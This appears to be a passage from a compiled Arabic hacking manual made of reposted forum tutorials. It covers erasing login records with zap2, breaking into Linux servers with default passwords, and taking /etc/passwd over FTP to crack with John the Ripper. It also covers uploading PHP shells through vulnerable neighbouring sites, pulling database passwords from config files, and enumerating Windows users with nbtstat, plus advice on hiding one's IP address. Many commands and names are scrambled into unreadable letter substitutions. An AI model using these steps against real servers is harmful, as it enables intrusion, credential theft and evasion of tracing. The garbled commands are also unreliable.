                                                      ‫ماذا لو طبقنا االمر ‪ who‬و لقينا معانا الرووت ؟؟‬


                                                ‫262‬
                                                                     ‫‪sh-2.03$ who‬‬
                                               ‫‪root‬‬    ‫1‪tty‬‬     ‫81:81 52 ‪Sep‬‬

                                                         ‫ممكن في الحاله دي نستخدم 2‪zap‬‬
                                                                     ‫لو اسمك ‪: luser‬‬

                                                      ‫‪sh-2.03$ ./zap2 luser‬‬
                                                                     ‫2‪!Zap‬‬
                                                             ‫‪sh-2.03$ who‬‬
                                                                   ‫$30.2-‪sh‬‬

                                                                                ‫كلمه اخيره :‬
   ‫هذا الموضوع هو عباره عن نبذه بسيطه للمبتدئين يمكنهم من البدايه بدايه موفقه باذن هللا ..‬
                                                                   ‫اتمنى ان يحوز على رضاكم.‬

                                    ‫انتهى،،،‬




‫" درس اخر في اختراق المواقع عن طريق لينكس "‬

                                                          ‫<منقول من منتدى هاكر فلسطسن>‬
                                                                     ‫<الكاتب: أبو رعد >‬



                                      ‫362‬
                                                                                     ‫اختراق لينكس...‬

   ‫و أنا كالعادة لست مسؤوال عن أي تصرف غبي أو أحمق يقوم به أي شخص و هذه المعلومات للعرض و‬
                                                                   ‫زيادة المعرفة الشخصية‬

  ‫في هذا القسم أقوم بشر ح الخطوات األساسية للقيام بعملية اختراق و تخريب على الشبكة فإذا كان لديك أية‬
                                   ‫معلومات أو شرو ح تود نشرها في هذا القسم الرجاء القيام بإرسالها لنا‬



                                                                                        ‫الـــهـــكـــر‬
                                            ‫نحن هنا في حاجة إلى خلفية بسيطة قبل الخول في التعقيدات‬

‫إن قول اختراق أو تخريب يعني الحصول على صالحيات على سيرفرات الشبكات ال يسمح لنا بالحصول عليها‬
     ‫في األحوال العادية فخوادم الشبكات معدة الستقبال العديد من الناس و لكل فرد منهم حساب على الشبكة‬
                                                         ‫فالنفترض أن لراشد حساب على الفريسرفرز‬

                                                  ‫‪ FreeServers.com‬مزود خدمات على االنترنت‬

                                                                                ‫الذي سيقوم بإعطائه :‬

                                                    ‫اسم مستخدم و هو التعريف لمجلد راشد على الشبكة‬

                                                    ‫كلمة مرور و هي مفتاحه للدخول إلى مجلده و قسمه‬

                                           ‫و هذان هما السبيل للوصول إلى جميع الخدمات المتاحة لراشد‬

                                                          ‫و سوف نركز على الوصول إلى اللب واألصل‬

‫هناك طريقتان رئيستان للدخول إلى نظام األولى تتمثل في الحصول على خليط من كلمة سر و اسم مستخدم و‬
            ‫هي بطيئة و نادرة وأما الطريقة الثانية فهي استغالل مناطق ضعف الخادم و التسلل من خاللها‬

 ‫إن التخريب ممنوع و إلنه من السهل مطاردتك إن إكتشاف محولتك لإلختراق عن طريق األي بي أدرس فهو‬
                  ‫رقم تعريفك على الشبكة و الحل هو أن تقوم بإعطاء بينات خاطئة لمزود خدمات شبكتك‬

‫يستخدم المخترقون أدوات لسرقة الرقم السري و اسم المستخم من األماكن العامة مثل مقاهي االنترنت و هذا‬
                                                                                       ‫أحد البرامج‬

‫قم بتغيير البروكسي و هذا هو األسهل أو التسجيل ببيانات و همية لموقع يضمن لك التصفح بخصوصية و قم‬
                                                        ‫بتعطيل خدمة ‪ Caller ID‬إذا كانت تعمل‬

                                        ‫نحن اآلن نأخذ الخطوة األولى ألي عملية هكر ...جمع المعلومات‬

  ‫البد أنك جاهز اآلن قم بتشغيل ‪ notepade‬ونافذة متصفح جديد من خالل محطم أي بي أو أي موقع آخر‬
                                                                                       ‫مثل‬

                                                               ‫‪Hakkerz.home.ml.org‬‬
                         ‫قم بفحص الموقع و تسجيل أي إيميل موجود و قم بنسخ ‪ html‬ألي صفحة مهمة‬



                                               ‫462‬
                                                     ‫قم بإرسال و همي لهم أقصد إيميل غير موجود مثال‬

                                                                     ‫@‪Blahblahblah‬اسم الموقع‬

‫و ينصح بإرساله من موقع بريد مجاني واستخدام جميع امكانياته المهم سيأتيك إيميل بسبب عدم جود البريد‬
                                  ‫المرسل إليه و معه بعض المعلومات الموجوده في ‪ header‬الرسالة‬

                   ‫أنت اآلن في حاجة إلى أدوات تعقب لمعرفة بعض المعلومات عن المزود للخادم الضحية‬

                  ‫أوال ستحتاج إلى األي بي ‪ IP‬و ثانيا خدمة التعريف ‪ Whois‬لتحصل عن معلومات عنه‬

                            ‫الذي سيعطيك معلومات عن مالكي الموقع و نوع السيرفر عليه و قم بتسجيلها‬

                                                        ‫اآلن عليك باستخدام خاصية ‪ finger‬جرب أوال‬

                                                                             ‫اسم الموقع @‪Finger‬‬

            ‫و إذا لم يقم بإعطائك معلومات التي قد تكون مفيدة جرب ايميل من التي حصلنا عليها في األعلى‬

 ‫اآلن عليك القيام بفحص المنافذ ‪ scan ports‬لألي بي ‪ IP‬الذي حصلنا عليه لكي تعرف المنافذ المفتوحة‬
  ‫و الخدمات التي يدعمها الموقع و هناك برامج جيدة لذلك و معظمها ألنظمة ‪Linux /Unix systems‬‬

                            ‫و هذا البرنامج ‪ Exploit Generator‬خاص بأنظمة ويندوز على الشبكات‬

‫و إن كنت ستخترق موقع شديد الحراسة فدعنا ننسى تفحص المنافذ لمدة ألن هذا العمل غير شرعي و قد يتم‬
     ‫الكشف عنه إال إذا ما كنت تمتلك نظام ‪ linux‬ما يهمنا من ذلك أنه إذا كان المنفذ 26 مفتوحا فيعني ذلك‬
                                            ‫أنهم يدعمون ‪ FTP‬و إن كان 32 فذلك أنهم يملكون ‪TelNet‬‬

  ‫‪Telnet‬الهدف من ذلك هو معرفة نوع السيرفر و أنت في وضع ‪ Anonymous‬في متصفحك و على‬
        ‫العموم للقيام بكل تلك األمور سالفة الذكر ستجد ما تحتاجه في الموقع التالي حتى ال تتعب في البحث‬
‫‪hakkerz.home.ml.org‬المهم فلنتابع حديثنا قم بفتح نافذة ‪ telnet‬و غير المنفذ إلى 36 و إذا كان‬
‫الموقع يبدأ ب ‪ www‬فجرب ذلك بدونها فإن لم يقم بإعطائك بينات فجرب إضافة ‪telnet.Victim.com‬‬
   ‫كلمة ‪ telnet‬كما ترى مكان ‪ www‬و إذا لم ينجح جرب أي من مواقع السرفرات التي حصلنا عليها من‬
              ‫‪whois‬و بمجرد نجاحك في الدخول قم بتسجيل أية بيانات تحتاجها و بالتحديد نوع السيرفر‬

                  ‫اآلن قم بتغيير المنفذ إلى 26 و اآلن سيأخذك إلى منفذ ال ‪ ftp‬فإن حصل ذلك جرب كتابة‬

    ‫‪SYST‬لتعرف نوع السيرفر اآلن إذا كنت محظوظا جرب المنفذ 08 الذي يعد منفذ ال ‪ http‬وسجل أي‬
         ‫بينات و أهمها على اإلطالق نوع السيرفر فإذا لم تنجح بعد ذلك كله جرب برنامج يدعى ‪Whats‬‬
                                        ‫?‪Running‬و قد يعمل و لكن سيرفر الضحية سيسجل ذلك‬

  ‫و كما ذكرت في البداية هناك طريقتان استخدام البرامج أو ايجاد الباسوورد و لنجرب اآلن الباسوورد الذي‬
                                                                             ‫ستحصل عليه باستخدام‬

                                                                                 ‫‪$Login: root‬‬
                                                                             ‫‪$Password: root‬‬

 ‫فلنقم بتجربة هذا أوال حيث أن برامج ‪ linux‬تأتي محملة بعدد من الباسوورد الجاهزة و هي غالبا تبقى كما‬
   ‫هي لذلك عليك القيام باتصال باستخدام ‪ telnet‬و الذي هو من الموقع سالف الذكر و ال تستخدم البرنامج‬
                          ‫العادي الموجود على جهازك وقم بتجربة الباسوورد و اسماء المستخدمين التالية‬


                                               ‫562‬
                                                                  ‫‪ACCOUNT: PASSWORD‬‬
                                                              ‫‪(login) root: (password) root‬‬
                                                                    ‫‪sys: sys / system / bin‬‬
                                                                               ‫‪bin: sys / bin‬‬
                                                                    ‫‪mountfsys: mountfsys‬‬
                                                                                  ‫‪adm: adm‬‬
                                                                                ‫‪uucp: uucp‬‬
                                                                               ‫‪nuucp: anon‬‬
                                                                                ‫‪anon: anon‬‬
                                                                                  ‫‪user: user‬‬
                                                                             ‫‪games: games‬‬
                                                                              ‫‪install: install‬‬
                                                                               ‫‪demo: demo‬‬
                                                                 ‫‪umountfsys: umountfsys‬‬
                                                                                 ‫‪sync: sync‬‬
                                                                              ‫‪admin: admin‬‬
                                                                               ‫‪guest: guest‬‬
                                                                         ‫‪daemon: daemon‬‬

     ‫و إذا لم تصلح فإن هناك العديد من الناس األغبياء الذين يستخدمون أسماء الدخول كباسوورد قم بتجربة‬
    ‫الشق األول من البريد االلكتروني كإسم مستخدم و كذلك كباسوورد أو من البيانات التي حصلت عليها من‬
‫‪whois‬و أن كنت تعيس الحظ إلى اآلن قم بالتجربة التالية على افتراض أنك تحاول الدخول إلى نظام ‪unix‬‬
 ‫فإنك لربما تتساءل كيف يتعرف النظام إلى الباسوورد و الجواب أن هناك ملف يدعى ‪ passwd‬لذلك علينا‬
       ‫المحاولة للوصول إليه و إحدى الطرق القديمة هي استخدام ال ‪ ftp‬و الذي سندخل إليه باستخدام نافذة‬
‫المتصفح و في نظري ‪ internet explorer‬ينفع في هذه الحالة و لكن عليك أن تكون غير معرف لهم و‬
 ‫كما فتحنا النافذة سابقا باستخدام ‪ IP jammer‬الموجود في موقع .‪ hakkerz.home.ml.org‬سنعيد‬
    ‫الكرة ثانية بل إن عملنا السابق و القادم يعتمد على اخفاء األي بي و قم بالتجربة عن طريق الشكل التالي‬
                                                                                                  ‫مثال‬

       ‫‪ftp:// abc.net‬أو /‪ ftp://ftp.abc.net‬و إن لم يعمل أي منها قم بتجربة أي مواقع ‪ ftp‬كانت‬
 ‫موجودة في البيانات المعطاة من ‪ whois‬فالنفترض أنك نجحت في الدخول اضغط على مجلد ‪ \etc‬و األن‬
         ‫ستر ملف ‪ passwd‬قم بتنزيله على جهازك وقم بفتحه و إن كان على الشكل التالي فأنت محظوظ‬

                                       ‫‪root:2fkbNba29uWys:0:1:Operator:/:/bin/csh‬‬
                                               ‫‪admin:rYsKMjnvRppro:100:11:WWW‬‬
                                      ‫‪administrator:/home/Common/WWW:/bin/csh‬‬
                                              ‫‪kangaroo:3A62i9qr:1012:10:Hisaharu‬‬
                                                                            ‫].‪[etc‬‬

  ‫و هنا ترى اسم المستخدم و هو ‪ kangaroo‬و تشفير الباسوورد وليس هي هو ‪ 3a62i9qr‬أو سيكون‬
                                                               ‫المنظر فوق أشبه بالتالي‬

                                          ‫‪root:*:0:1:Operator:/:/bin/csh‬‬
      ‫‪admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh‬‬
                                         ‫‪kangaroo:*:1012:10:Hisaharu‬‬

                               ‫‪TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh‬‬

              ‫و هنا كما تشاهد فإن الباسوورد المشفرة استعيض عنها بباسوورد يصعب فك تشفيرها و هو‬


                                                ‫662‬
‫‪*’s‬أو ?‪ x’s‬و إن حصلت على النوع في األعلى فإن هناك برامج مخصصة لملفات الباسوورد ليونكس و‬
                ‫فك تشريرها مثل 5.1 ‪ John the Ripper‬و الذي يحتاج إلى ملفات كلمات كثيرة.‬

                                      ‫انتهى،،،‬




           ‫" درس عن الـ‪( PHP Shell‬الجزء األول) "‬

                                                        ‫<منقول من موقع ‪> pharaonics‬‬
                                                             ‫<الكاتب:‪< AAit eaUAxC‬‬

                       ‫موضوع للبي اتش بي شل يشر ح الطرق والخداع المستخدمة و اوامر لينكس‬
                                                                           ‫السالم عليكم...‬


                                        ‫762‬
‫البي اتش بي شيل ملف يرعب كل صاحب موقع على سيرفر وحله اسهل مما يمكن‬

                          ‫الموضوع بسيط جداً لكن سأطوله قليالً فسمحولي :)‬

                                                                      ‫اوالً :‬

                                                        ‫راجع الوصلة التالية‬


                                                                      ‫ثانيا ً :‬

     ‫اآلن وبعد قراءتك الموضوع كامال اتوقع منك معرفة ما هو الـ ‪H LpUss‬‬

                          ‫*----------------------------------------------- *‬

                                                              ‫الجزء األول :‬

                                                               ‫اوامر لينكس‬

                          ‫*----------------------------------------------- *‬

                                                   ‫امر سرد الملفات : ‪i-ss‬‬

                                        ‫سرد جميع الملفات المخفية او غيرها‬

                          ‫*----------------------------------------------- *‬

                               ‫امر عرض محتويات الملف : ‪ U-mit‬او ‪mit‬‬

                                                ‫فتح الملف وعرض محتوياته‬

                          ‫*----------------------------------------------- *‬

                                                   ‫امر حذف الملف : ‪c-Ac‬‬

                                                     ‫لحذف الملف الذي تريد‬

                          ‫*----------------------------------------------- *‬

                                                 ‫امر حذف المجلد : ‪o-Ac‬‬

                                                     ‫لحذف المجلد الذي تريد‬

                          ‫*----------------------------------------------- *‬

                                                         ‫امر النسخ : ‪a-mh‬‬

                                                      ‫لنسخ الملف الذي تريد‬

                          ‫*----------------------------------------------- *‬


                    ‫862‬
                                             ‫امر اعادة التسمية : ‪cr‬‬

                                                       ‫ألعادة التسمية‬

                    ‫*----------------------------------------------- *‬

‫مالحظة : لمعرف المزيد من اوامر لينكس قم بشراء الكتب وللحصول على‬

            ‫معلومات اكثر ألمر من األوامر كم بوضع األمر ثم --‪pUsh‬‬

                                                   ‫مثال : ‪pUsh--ss‬‬

                    ‫*----------------------------------------------- *‬

                    ‫*----------------------------------------------- *‬
                    ‫*----------------------------------------------- *‬

                                                        ‫الجزء الثاني :‬

                                                  ‫كيفية تنفيذ األوامر :‬

                    ‫*----------------------------------------------- *‬




              ‫962‬
      ‫2- ستجد مربع للكتابة قم بكتابة األمر المراد تنفيذه‬

                       ‫6- هنا تعرض الملفات والمجلدات‬

                            ‫3- هنا تعرض المجلدات فقط‬

                   ‫.- مكان الفلودر الذي تعمل عليه اآلن‬

         ‫5- ضع العالمة ليخبرك ما يحدث عند وجود خطأ‬
      ‫*----------------------------------------------- *‬
      ‫*----------------------------------------------- *‬

                                         ‫الجزء الثالث :‬



‫072‬
                                               ‫الخدع والطرق لتحميل هذا الملف :‬

                               ‫*----------------------------------------------- *‬

                                                            ‫هنا تأتي المشكله !!!‬

              ‫لكن ليست مستحيله وسنستعرض بعض الطرق التي اتبعها انا شخصيا ً‬

                                         ‫2- ايجاد ثغرة تستطيع منها تحميل الملف‬

                                ‫مثال : ثغرة النوك القديمة حقت الـ ‪tut.pimrUo‬‬

                               ‫*----------------------------------------------- *‬

      ‫6- لنفرض اننا نريد اختراق موقع معين وكان صاحب الموقع ذكي جداً وحريص‬

       ‫هذي طريقه قد تنفع اوالً تحديد الشركة المستضيفة و نحاول البحث عن مواقع‬

        ‫في نفس السيرفر او على األقل في نفس شركة األستضافة يكون صاحبها دلخ‬

                                              ‫ونحاول نلقى ثغرة نحمل منها الملف‬

                               ‫*----------------------------------------------- *‬

                                     ‫3- المواقع المجانية التي تدعم البي اتش بي.‬

                       ‫انتهى،،،‬




‫" درس عن الـ‪( PHP Shell‬الجزء الثاني) "‬

                         ‫172‬
                                           ‫<منقول من موقع ‪> pharaonics‬‬
                                               ‫<الكاتب:‪< Zare V barA‬‬



                                                      ‫نتابع الموضوع مباشره‬


                           ‫*----------------------------------------------- *‬
                           ‫*----------------------------------------------- *‬

                                                              ‫الجزء الرابع :‬

                                                ‫طرق الحصول على الباسورد:‬

                           ‫*----------------------------------------------- *‬

                               ‫هذا الجزء سيأخذ موضوع الـ ‪6 H LpUss‬‬

    ‫طرق الحصول على الباسورد هي من اصعب الطرق التي قد تواجه المخترق .‬

                           ‫*----------------------------------------------- *‬

‫التي تسمى بالعادة ‪hph.moRcar‬‬     ‫2- اخذ الباس من ملفات اكسس الـ ‪L LQL‬‬

             ‫ويمكن اخذ الباس عن طريق تنفيذ األمر التالي في الـ ‪H LpUss‬‬

               ‫الذهاب الى المجلد الذي يوجد فيه هذا الملف وكتابة األمر التالي‬

                                                        ‫‪hph.mit moRcar‬‬

                                         ‫وسيظهر الباسورد في احد المتغيرات‬

                           ‫*----------------------------------------------- *‬

                           ‫6- اخذ الباس المشفر من ملف الـ .‪pthisswUo‬‬

           ‫ويمكن اجاد هذا الملف في احد مجلدات السيرفر واذا لم تجده قم بفتح‬

                               ‫الـ .‪ ptimmUss‬حتى تجد مكان الملف السابق‬

        ‫مثال : ‪/hisswo/iocaR/coAxc/pthisswos./satU/pocU‬‬

   ‫األمر : ‪hisswo/iocaR/coAxc/pthisswos./satU/pocU/mit‬‬

             ‫ستجد الباس المشفر بتشفير ‪ eEL‬يعني تقدر تفكه بجون ذا رايبر‬

                                             ‫‪oUAoo3oL.RLcw:xsUA‬‬
                           ‫*----------------------------------------------- *‬


                     ‫272‬
                           ‫3- طريقة األكستينشون سيرفر او ‪: hwo.sUAramU‬‬

       ‫وهو تابع للفرونت بيج ويوجد به الباسورد الخاص بالفرونت بيج مشفر ‪eEL‬‬

                                                             ‫ويوجد داخل مجلد :‬

                                                                     ‫_‪hrt_rta‬‬

               ‫األمر : ‪hwo.sUAramU/hrt_rta_/www/satU/pocU/mit‬‬

                                  ‫رابط : راجع درس ‪ eUXXi‬الخاص بهذا القسم‬

                                                 ‫‪oUAoo3oL.RLcw:xsUA‬‬

                               ‫*----------------------------------------------- *‬

                               ‫.- ال يمكن اعتبارها كقسم الكن كمالحظة اال وهي :‬

                   ‫ان بعض المواقع تتحد في سكربتات مثل الـ ‪hph LAocaR‬‬

                               ‫ويكون لكن موقع اكسس خاص لدخول هذا السكربت‬

                           ‫ويكون بملف الـ ‪ hph.moRcar‬يكون الروت للقاعدة‬

                               ‫يعني يمكن تعدل وتمسح اي قاعدة ألي موقع كان !!‬

                       ‫انتهى،،،‬




‫" درس عن الـ‪( PHP Shell‬الجزء الثالث) "‬




                         ‫372‬
                                               ‫<منقول من موقع ‪> pharaonics‬‬
                                                   ‫<الكاتب:‪< Zare V barA‬‬

                                           ‫الجزء الخامس و األخير من هذا الدرس‬

       ‫بما انك اآلن عرفت معظم األشياء لكن البد من وجود مشاكل سأذكر الذي اصابني‬

                                           ‫*----------------------------------- *‬

                                              ‫2- مشكلة عرض المواقع االخرى :‬

                                         ‫جميع المواقع الموجودة في السيرفر في :‬

                                                                       ‫/‪pocU‬‬

                                             ‫األمر : قم بالذهاب الى مجلد الروت /‬

                                                                 ‫‪pocU/i -ss‬‬

                              ‫ستجد مجلدات كل مجلد يحوي ملفات موقع ما لعرضه‬

                                                         ‫‪LVAE/pocU/i -ss‬‬

                                                  ‫‪ = LVAE‬اسم الموقع او المجلد‬

                                           ‫*----------------------------------- *‬

                                                ‫6- مشكلة عرض ملفات الموقع :‬

‫بعض السيرفرات ال تسمح بدخول ‪ pocU‬الموقع اال اذا كنت انت روت او صاحب الموقع‬

                                                                          ‫الحل :‬

                                                                      ‫قم بدخول :‬

                                               ‫‪/ptcs_hxtsam/satU/pocU‬‬

                                                                              ‫او‬

                                                         ‫‪/www/satU/pocU‬‬

                                             ‫لدخول الى ملفات الموقع التي تعرض‬

                                           ‫*----------------------------------- *‬

                                                        ‫3- بعض األوامر ال تعمل‬

            ‫هذه مشكله من الصعب حلها ويجب استعمال باك دور خاص بكرنل السيرفر‬

                                                             ‫اقصد اصدار الكرنل.‬


                           ‫472‬
       ‫انتهى،،،‬




‫" شرح أداة ‪" anmap‬‬

                                         ‫<منقول>‬
                     ‫<مترجم بواسطة: الهكر الخجول>‬


        ‫572‬
                                                                                         ‫اإلسم :‬
                                                      ‫‪ - nmap‬أداة كشف عن الشبكات و ماسح أمني‬

                                                                                         ‫الخالصة :‬
                                                                             ‫أنواع المسح - الخيارات‬

                                                                                           ‫الوصف :‬

                             ‫صمم هذا البرنامج لكي يسمح لمدراء النظام و األفراد بمسح شبكات كبيرة‬
                                  ‫لتقرير و معرفة المضيفين وماذا يقدمون من خدمات . وتدعم اإلنماب‬
                                                                  ‫عدد كبير من تقنيات المسح مثل :‬

                                                                                      ‫‪UDP‬‬
                                                                            ‫‪)(TCP connect‬‬
                                                                      ‫‪)TCP SYN (half open‬‬
                                                                 ‫‪)ftp proxy (bounceattack‬‬
                                                                             ‫‪Reverse-ident‬‬
                                                                        ‫‪)ICMP (ping sweep‬‬
                                                                                       ‫‪FIN‬‬
                                                                               ‫‪ACK sweep‬‬
                                                                               ‫‪Xmas Tree‬‬
                                                                               ‫‪SYN sweep‬‬
                                                                            ‫‪.and Null scan‬‬

                                                 ‫اإلنماب تقدم أيضا ً عدد من المميزات المتقدمة .. مثل:‬

                                ‫‪TCP/IP fingerprinting remote OS detection via‬‬
                                                               ‫‪stealth scanning‬‬
                            ‫‪dynamic delay and retransmission calculations‬‬
                                                               ‫‪parallel scanning‬‬
                                  ‫‪detection of down hosts via parallel pings‬‬
                                                           ‫‪decoy scanning port‬‬
                                                              ‫‪filtering detection‬‬
                                      ‫‪direct (non-portmapper) RPC scanning‬‬
                                                       ‫‪fragmentation scanning‬‬
                                          ‫‪flexible target and port specification‬‬

                              ‫نتائج اإلنماب عادةاً ماتكون على هيئة قائمة بالبورتات المهمه التي توجد‬
  ‫في اآللة التي أجريت عليها عملية المسح . واإلنماب دائما ً يعطينا البورتات وإسم الخدمة والعدد والحالة‬
                                                                                        ‫والبروتوكول‬

                                                ‫الحاله إما أن تكون مفتوحة او مرشحة أو غير مرشحة‬

                                              ‫مفتوحة تعني أن اآللة سوف تقبل أي إتصال بهذا البورت‬

‫المرشحة تعني أن هناك فايروول أو فلتر (مرشح) أو أي عقبة أخرى تغطي هذا البورت وتمنع اإلنماب من‬
                                                        ‫معرفة حالة البورت إذا كان مفتوحا ً أو ال‬

                                     ‫غير مرشح تعني بأن هذا البورت معروف لدى اإلنماب بأنه مغلق‬
                                    ‫وال يبدو أن أي فايروول أو فلتر (مرشح) تدخل في محاولة اإلنماب‬


                                              ‫672‬
 ‫والبورتات غير المرشحة هي أغلب الحاالت وال يمكن معرفتهم إال في حالة واحدة ، هي أن يكون معظم‬
                                                                                   ‫البورتات‬
                                                    ‫التي أجريت لهم عملة المسح في حالة ترشيح‬

‫وباإلعتماد على الخيارات المستخدمه في اإلنماب فيمكن أن يبلغ عن الحاالت المميزة التالية في الريموت‬
                                                                                        ‫هوست :‬
                                                                                 ‫النظام المستخدم‬

                                                                     ‫‪TCP sequencability‬‬

                                      ‫أسماء المستخدمين الذين يشغلون البرامج المرتبطة بكل بورت‬

                                                                            ‫أسماء الدي إن إس‬
                                                                         ‫وبعض األشياء األخرى.‬



                                         ‫انتهى،،،‬




       ‫" طريقة إلقتحام السيرفرات بدون ثغرات "‬

                                                      ‫<منقول من منتديات شبكة الحزم اإلسالمية>‬
                                                             ‫<الكاتب: ‪>network access‬‬




                                           ‫772‬
‫استخدام الثغرات انا بصراحه ماشوف فيه اي فن وال علم بصراحه انت تستخدم شي جاهز وهذي وجه نظري‬
                                                  ‫يعني ماتحس انك تسوي شي متعب ياخذ منك جهد ووقت‬
‫لكن في طرق كثيره جدا غير استخدام الثغرات ويمكن كل واحد له طريقته واسلوبه حتى في استغالل الثغرات‬
      ‫لكن بما انك انسان يفترض انك هاكر وتشوف نفسك متمكن اعتقد مسئله اقتحام سيرفر او موقع مارا ح‬
     ‫تربطها بوقت وزمان يعني ممكن الواحد يجلس يحاول لمده شهر شهرين ثالثه وكل مره يفشل الين يقدر‬
 ‫يوصل في االخير لنتيجه وعلى االساس هذا انا كتبت الموضوع هذا الي انشاهلل اتمنى انه يكون مفيد وينفعنا‬
                                                                                              ‫هللا فيه‬
                                       ‫مارا ح نتكلم عن المشاركه( احس اني ازعجتكم بمواضيع المشاركه )‬
 ‫فيه طرق معروفه تمكنك من الدخول ولو بنسبه 25% على اغلب السيرفرات الموجوده بالعالم الحظ 25%‬

  ‫اوال الجهمات االولى دائمايكون الغرض منها تكوين معلومات عامه عن السيرفر الذي يراد مهاجمتته ومن‬
                                                    ‫هنا نبدا الهجوم وعلى اي اساس يتركز الهجوم‬

 ‫احيانا يكون هجوم حرمان خدمه واحيانا هجوم اقتحام كامل حسب الموجود والمتوفر والمعلومات الموجوده‬
                                                                                          ‫لدينا‬

‫طيب لنفرض اننا ودنا نخش على شركه معينه باسم ‪ aswind.COM‬الخطوه األولى هي التعرف على مدى‬
                                                   ‫عنوان ‪ ip‬الخاصه بهذه الشركه وهذا سهل‬
                                        ‫اول شي انصح بالتسجيل في موقع ‪INTERNIC.NET‬‬
                                                                 ‫حتى يعطونك خدمات تستاهل‬
                                                           ‫هناك طريقتين لمعرفه االي بي اوال‬
                                                      ‫عن طريق الموقع‪INTERNIC.NET‬‬
                                                   ‫والثانيه عن طريق برنامج الدوس باالمر :‬

                                                                                   ‫‪NSLOOKUP‬‬
                                                                             ‫‪SET TYPE = ALL‬‬
                                                                                  ‫‪aswind.COM‬‬
                                                                  ‫را ح تطلعلك المعلومات هذي بالضبط :‬

                                                        ‫‪Domain Name: ASWIND.COM‬‬
                                                         ‫.‪Registrar: ONLINENIC, INC‬‬
                                                ‫‪Whois Server: whois.OnlineNIC.com‬‬
                                             ‫/‪Referral URL: http://www.onlinenic.com‬‬
                                                    ‫‪Name Server: DNS.ASWIND.COM‬‬
                                                    ‫‪Name Server: NS1.ASWIND.COM‬‬
                                                          ‫2002-‪Updated Date: 01-apr‬‬

             ‫معنا الكالم هذا ان شركه ‪ aswind.com‬وضعت ارقام الملقامات الخاصه ب2 = ‪DNS‬‬
   ‫يعني عدد 6 خادم ‪ DNS‬وسوت لها نشر يعني هناك على االقل سيرفرين شغالين بخدمه ‪ DNS‬يعني هم‬
                     ‫يتعتقدون ان الموضوع مارا ح ياخذ كثير من طاقه التشغيل لألجهزه خاصه ‪DNS‬‬

                         ‫هنا في مجال للدخول وتعديل بيانات ‪ DNS‬بمعنى ان العمليه تصير واسعه شوي‬
    ‫فقط قم بنشر عنوانين من عنواوين ‪ Ip‬فقط مثل ماسوو ‪ aswind.com‬لكن لنفترض انه فيه اكثر من‬
                                                                          ‫عنوان لنفول 2 مثال .‬
  ‫عشان كذا اقتر ح على الشركات وضع عنواونين ‪ IP‬للنشر ووضع خوادم ‪ DNS‬على اجهزه قديمه وبطيئه‬
  ‫ألنك اساسا في حاجه ل ‪DNS‬دايناميكي وهذا يعني انك تقوم بتشغيل ‪ WIN2K‬وخدمه ‪ DNS‬على جهاز‬
                         ‫واحد وهذي من االفكار الجيده في نظري اذا وضعت جهاز خاص فقط بال ‪DNS‬‬

   ‫طيب لنفرض انك مالقيت شي على اجهزه ‪ DNS‬وبما انك في بدايه هجوم هذا يعني انه عندك متسع من‬
‫الوقت اذن قم بتجريب جميع العناوين المتوفره لديك والتي حصلت عليها من ‪ HowIS‬وصدقوني فيه ادوات‬


                                                ‫872‬
                                  ‫موجوده بالنت مممكن انها تمسح مجموعه ‪ IP‬موجوده في شبكه معينه‬

   ‫طيب قم بعمل ملف اسمه ‪ LMHOSTS‬يوجود فيه اسم ‪ NetBios‬لكل عنوان ‪ IP‬استطعت انك تحصل‬
                                                                                              ‫عليه‬
  ‫يعني انت عرفت ان الشبكه من كالس ‪ C‬وعنوانها 2.226.226.226 سو لك ملف ‪ LMHOSTS‬باسم‬
                ‫‪NetBios‬وملف باسم 2.002.002.002 = 2‪ N‬وهكذا بعدين تحتاج عمل ‪Net view‬‬
        ‫‪//servername‬لكل اسم من 1‪ N‬إلى 452‪ N‬يعني كانك تسوي سكان بورت بس بطريقه ثانيه‬
                                                                   ‫من جهاز رقم 2 إلى جهاز رقم .56‬
         ‫وبالنسبه لألجهزه الصحيحه سوف تشتغل الخدمه فيها ام العناوين الغير متصله فلن تستجيب طبعا ً‬

                                                                   ‫طيب انت اال االن ماتقدر تسوي شي \‬
     ‫بس تقدر تتاكد من حساب ‪ Administrator‬موجود واال ال او تم تغييره او اذا هناك يوزر نيم بنفس‬
                                                  ‫الصالحيات انت بطبيعه الحال ماتقدر تحصل عليه بسهوله‬
   ‫اذن هناك ابواب خلفيه للحصول عليه من بعض الطرق الوصول لبعض اسماء المستخدمين الموجودين في‬
                  ‫الشركه وهذا يعتبر عيب من عيون ‪ Windwos‬النها تطنشهم ههههههههه مدري ليش‬
   ‫فيه امر تقدر تعرف من خالله بس أال االن انت ماتقدر تسويه النه مالك حق وصول مباشر يعني انت الزم‬
  ‫تحصل على ‪ username and password‬الي يوزر موجود في المجال االمر هو ‪ net user‬وهو‬
                                                        ‫يستعرضلك جميع المستخدمين الموجودين بالمجال‬
                                                     ‫لكن فيه طريقه للحصول على اسماء بالهبل ههههههه‬
                                                                                              ‫كيف ؟؟‬
  ‫االن عندما يقوم مستخدم بتسجيل دخول يقوم جهازه ليس فقط بتسجيل اسمه فقط بل اسم جهازه يعني على‬
  ‫سبيل المثال مدير الشبكه اذا صار عنده زحمه يشغل خدمه اسمها مراقبه النظام حتى يعرف انه وصل للحد‬
                                                                                              ‫األقصى‬
  ‫عندما يقوم مستخدم بتسجيل الدخول تقوم خدمه ‪ Messenger Service‬بتسجيل اسم المستخدم كاحد‬
 ‫اسماء ‪ NetBios‬الموجودين في الشبكه الي انت اساسا جالس تبحث عنهم وعلى افتراض انك دخلت على‬
‫خادم بعنوان 002.002.002.002 ‪ IP‬فأن اي شخص اذا قام بعمل 002.002.002.002 ‪nbtstat -a‬‬
‫سيتكمن من معرفه اسم جهازك واسم المستخدم واذا كان جهازك ‪ MSBROWSER‬او ال ( سوف اتحدث‬
                                                                                      ‫عنها بالتفصيل )‬
  ‫طيب لنفرض ان فيه شخص باسم ‪ John‬ورقم05.002.002.002 ‪ IP‬موجود في الشبكه فانك اذا قمت‬
         ‫بعمل 05.002.002.002 ‪ Nbtstat -a‬را ح يضهرلك انه فيه شخص باسم ‪ john‬واسم جهازه‬
                                                                                          ‫‪johnPC‬‬
                     ‫األن موجود معك اسم مستخدم ( احتمال يكون ‪) Administrator‬طيب وش نسوي‬
                                                                                                    ‫؟‬

  ‫قوم بتعطيل خدمه ‪ Messenger Service‬في جهزك ( ولن يتم تسجيل اسمك في النطاق يعني بتخش‬
                                                                                             ‫مخفي )‬
                                 ‫وبالسنبه ل ‪ MSBROWSER‬اذا شفتها بعد عمل االمر ‪nbtstat -a‬‬
